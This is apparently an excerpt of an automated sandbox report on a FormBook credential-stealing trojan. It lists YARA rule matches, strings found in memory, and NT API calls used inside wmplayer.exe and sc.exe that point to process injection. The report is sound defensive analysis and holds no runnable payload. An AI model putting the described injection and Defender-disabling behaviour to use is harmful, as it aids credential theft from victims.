            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/login/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/neue-top-level-domain/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/unternehmen/datenschutz/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/unternehmen/kontakt/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
            Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
            Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0042B163 NtClose,6_2_0042B163
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033135C0 NtCreateMutant,LdrInitializeThunk,6_2_033135C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312B60 NtClose,LdrInitializeThunk,6_2_03312B60
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03312DF0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03312C70
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03314340 NtSetContextThread,6_2_03314340
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03313010 NtOpenDirectoryObject,6_2_03313010
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03313090 NtSetValueKey,6_2_03313090
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03314650 NtSuspendThread,6_2_03314650
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312BA0 NtEnumerateValueKey,6_2_03312BA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312B80 NtQueryInformationFile,6_2_03312B80
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312BF0 NtAllocateVirtualMemory,6_2_03312BF0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312BE0 NtQueryValueKey,6_2_03312BE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312AB0 NtWaitForSingleObject,6_2_03312AB0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312AF0 NtWriteFile,6_2_03312AF0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312AD0 NtReadFile,6_2_03312AD0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033139B0 NtGetContextThread,6_2_033139B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312F30 NtCreateSection,6_2_03312F30
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312F60 NtCreateProcessEx,6_2_03312F60
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312FB0 NtResumeThread,6_2_03312FB0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312FA0 NtQuerySection,6_2_03312FA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312F90 NtProtectVirtualMemory,6_2_03312F90
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312FE0 NtCreateFile,6_2_03312FE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312E30 NtWriteVirtualMemory,6_2_03312E30
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312EA0 NtAdjustPrivilegesToken,6_2_03312EA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312E80 NtReadVirtualMemory,6_2_03312E80
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312EE0 NtQueueApcThread,6_2_03312EE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312D30 NtUnmapViewOfSection,6_2_03312D30
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312D10 NtMapViewOfSection,6_2_03312D10
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03313D10 NtOpenProcessToken,6_2_03313D10
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312D00 NtSetInformationFile,6_2_03312D00
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03313D70 NtOpenThread,6_2_03313D70
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312DB0 NtEnumerateKey,6_2_03312DB0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312DD0 NtDelayExecution,6_2_03312DD0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312C00 NtQueryInformationProcess,6_2_03312C00
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312C60 NtCreateKey,6_2_03312C60
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312CA0 NtQueryInformationToken,6_2_03312CA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312CF0 NtOpenProcess,6_2_03312CF0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312CC0 NtQueryVirtualMemory,6_2_03312CC0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B4340 NtSetContextThread,LdrInitializeThunk,13_2_035B4340
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B3090 NtSetValueKey,LdrInitializeThunk,13_2_035B3090
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B4650 NtSuspendThread,LdrInitializeThunk,13_2_035B4650
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B35C0 NtCreateMutant,LdrInitializeThunk,13_2_035B35C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2B60 NtClose,LdrInitializeThunk,13_2_035B2B60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_035B2BF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2BE0 NtQueryValueKey,LdrInitializeThunk,13_2_035B2BE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_035B2BA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2AD0 NtReadFile,LdrInitializeThunk,13_2_035B2AD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2AF0 NtWriteFile,LdrInitializeThunk,13_2_035B2AF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B39B0 NtGetContextThread,LdrInitializeThunk,13_2_035B39B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2F30 NtCreateSection,LdrInitializeThunk,13_2_035B2F30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2FE0 NtCreateFile,LdrInitializeThunk,13_2_035B2FE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2FB0 NtResumeThread,LdrInitializeThunk,13_2_035B2FB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2EE0 NtQueueApcThread,LdrInitializeThunk,13_2_035B2EE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_035B2E80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2D10 NtMapViewOfSection,LdrInitializeThunk,13_2_035B2D10
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_035B2D30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2DD0 NtDelayExecution,LdrInitializeThunk,13_2_035B2DD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_035B2DF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_035B2C70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2C60 NtCreateKey,LdrInitializeThunk,13_2_035B2C60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_035B2CA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B3010 NtOpenDirectoryObject,13_2_035B3010
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2B80 NtQueryInformationFile,13_2_035B2B80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2AB0 NtWaitForSingleObject,13_2_035B2AB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2F60 NtCreateProcessEx,13_2_035B2F60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2F90 NtProtectVirtualMemory,13_2_035B2F90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2FA0 NtQuerySection,13_2_035B2FA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2E30 NtWriteVirtualMemory,13_2_035B2E30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2EA0 NtAdjustPrivilegesToken,13_2_035B2EA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B3D70 NtOpenThread,13_2_035B3D70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B3D10 NtOpenProcessToken,13_2_035B3D10
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2D00 NtSetInformationFile,13_2_035B2D00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2DB0 NtEnumerateKey,13_2_035B2DB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2C00 NtQueryInformationProcess,13_2_035B2C00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2CC0 NtQueryVirtualMemory,13_2_035B2CC0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2CF0 NtOpenProcess,13_2_035B2CF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27B70 NtCreateFile,13_2_02E27B70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27E40 NtClose,13_2_02E27E40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27F90 NtAllocateVirtualMemory,13_2_02E27F90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27CD0 NtReadFile,13_2_02E27CD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27DB0 NtDeleteFile,13_2_02E27DB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34681CC00_2_00007FFD34681CC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346850B00_2_00007FFD346850B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346844FC0_2_00007FFD346844FC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD3468CA600_2_00007FFD3468CA60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD3468EF490_2_00007FFD3468EF49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34694F380_2_00007FFD34694F38
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD3468BF390_2_00007FFD3468BF39
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34693F620_2_00007FFD34693F62
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346810480_2_00007FFD34681048
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346898280_2_00007FFD34689828
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346898200_2_00007FFD34689820
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346908EA0_2_00007FFD346908EA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34688B380_2_00007FFD34688B38
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346947F90_2_00007FFD346947F9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD347600030_2_00007FFD34760003
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004030A06_2_004030A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00402AC06_2_00402AC0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00402AB86_2_00402AB8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004023706_2_00402370
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040FC8A6_2_0040FC8A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040FC936_2_0040FC93
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004165EE6_2_004165EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004165F36_2_004165F3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0042D6036_2_0042D603
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040FEB36_2_0040FEB3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040DF2B6_2_0040DF2B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040DF336_2_0040DF33
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339132D6_2_0339132D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CD34C6_2_032CD34C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339A3526_2_0339A352
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0332739A6_2_0332739A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A03E66_2_033A03E6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE3F06_2_032EE3F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033802746_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E52A06_2_032E52A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C06_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D01006_2_032D0100
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A1186_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB16B6_2_033AB16B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0331516C6_2_0331516C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF1726_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A01AA6_2_033A01AA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EB1B06_2_032EB1B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033981CC6_2_033981CC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033970E96_2_033970E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339F0E06_2_0339F0E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C06_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338F0CC6_2_0338F0CC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E07706_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033047506_2_03304750
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339F7B06_2_0339F7B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DC7C06_2_032DC7C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FC6E06_2_032FC6E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033916CC6_2_033916CC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E05356_2_032E0535
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033975716_2_03397571
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337D5B06_2_0337D5B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A05916_2_033A0591
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339F43F6_2_0339F43F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D14606_2_032D1460
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033924466_2_03392446
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338E4F66_2_0338E4F6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FB766_2_0339FB76
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339AB406_2_0339AB40
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FFB806_2_032FFB80
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0331DBF96_2_0331DBF9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03396BD76_2_03396BD7
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03353A6C6_2_03353A6C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FA496_2_0339FA49
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03397A466_2_03397A46
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03325AA06_2_03325AA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337DAAC6_2_0337DAAC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DEA806_2_032DEA80
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338DAC66_2_0338DAC6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F69626_2_032F6962
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E99506_2_032E9950
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB9506_2_032FB950
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E29A06_2_032E29A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AA9A66_2_033AA9A6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D8006_2_0334D800
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E28406_2_032E2840
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EA8406_2_032EA840
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C68B86_2_032C68B8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330E8F06_2_0330E8F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E38E06_2_032E38E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03300F306_2_03300F30
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03322F286_2_03322F28
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FF096_2_0339FF09
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03354F406_2_03354F40
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FFB16_2_0339FFB1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1F926_2_032E1F92
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032ECFE06_2_032ECFE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D2FC86_2_032D2FC8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339EE266_2_0339EE26
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0E596_2_032E0E59
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E9EB06_2_032E9EB0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339CE936_2_0339CE93
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F2E906_2_032F2E90
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339EEDB6_2_0339EEDB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EAD006_2_032EAD00
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03397D736_2_03397D73
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03391D5A6_2_03391D5A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E3D406_2_032E3D40
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F8DBF6_2_032F8DBF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DADE06_2_032DADE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FFDC06_2_032FFDC0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03359C326_2_03359C32
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0C006_2_032E0C00
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380CB56_2_03380CB5
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FCF26_2_0339FCF2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D0CF26_2_032D0CF2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0356D34C13_2_0356D34C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363A35213_2_0363A352
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363132D13_2_0363132D
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036403E613_2_036403E6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358E3F013_2_0358E3F0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035C739A13_2_035C739A
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0362027413_2_03620274
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036212ED13_2_036212ED
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359B2C013_2_0359B2C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035852A013_2_035852A0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0364B16B13_2_0364B16B
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0356F17213_2_0356F172
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B516C13_2_035B516C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0360815813_2_03608158
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357010013_2_03570100
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0361A11813_2_0361A118
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036381CC13_2_036381CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036401AA13_2_036401AA
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358B1B013_2_0358B1B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363F0E013_2_0363F0E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036370E913_2_036370E9
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035870C013_2_035870C0
